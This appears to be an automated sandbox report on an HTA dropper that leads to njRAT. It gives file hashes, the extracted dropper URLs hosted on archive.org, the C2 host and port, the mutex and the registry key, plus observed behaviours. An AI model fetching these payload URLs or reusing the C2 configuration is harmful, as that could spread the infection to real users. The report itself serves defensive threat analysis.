General

  • Target

    ac374efc62c6d14364c314e119e576ba

  • Size

    1KB

  • Sample

    240228-swgwcseg85

  • MD5

    ac374efc62c6d14364c314e119e576ba

  • SHA1

    578d0cfc3271dc0831a03a98776c5eb62c4dcb84

  • SHA256

    2ebc6f6879d6b4b2bdacdc34d4472b5f5c2a46c0b4d4907bab6b56af56ea0cb3

  • SHA512

    95e4af6eb641be115df0bf5c6f333d6039956f0f1407b05408e5877d5a5e342a5440429d17e808048c3c1b27c382a942d8de8d0c5a2230bb1abf769ca57a497a

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://ia601406.us.archive.org/21/items/invoice-011/Invoice%23011.txt

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ia601509.us.archive.org/18/items/bypass_20210729_1426/bypass.txt

Extracted

Family

njrat

Version

v4.0

Botnet

HacKed

C2

gerousd8.duckdns.org:7827

Mutex

Windows

Attributes
  • reg_key

    Windows

  • splitter

    |-F-|

Targets

    • Target

      ac374efc62c6d14364c314e119e576ba

    • Size

      1KB

    • MD5

      ac374efc62c6d14364c314e119e576ba

    • SHA1

      578d0cfc3271dc0831a03a98776c5eb62c4dcb84

    • SHA256

      2ebc6f6879d6b4b2bdacdc34d4472b5f5c2a46c0b4d4907bab6b56af56ea0cb3

    • SHA512

      95e4af6eb641be115df0bf5c6f333d6039956f0f1407b05408e5877d5a5e342a5440429d17e808048c3c1b27c382a942d8de8d0c5a2230bb1abf769ca57a497a

    Score
    10/10
    • njRAT/Bladabindi

      Widely used RAT written in .NET.

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks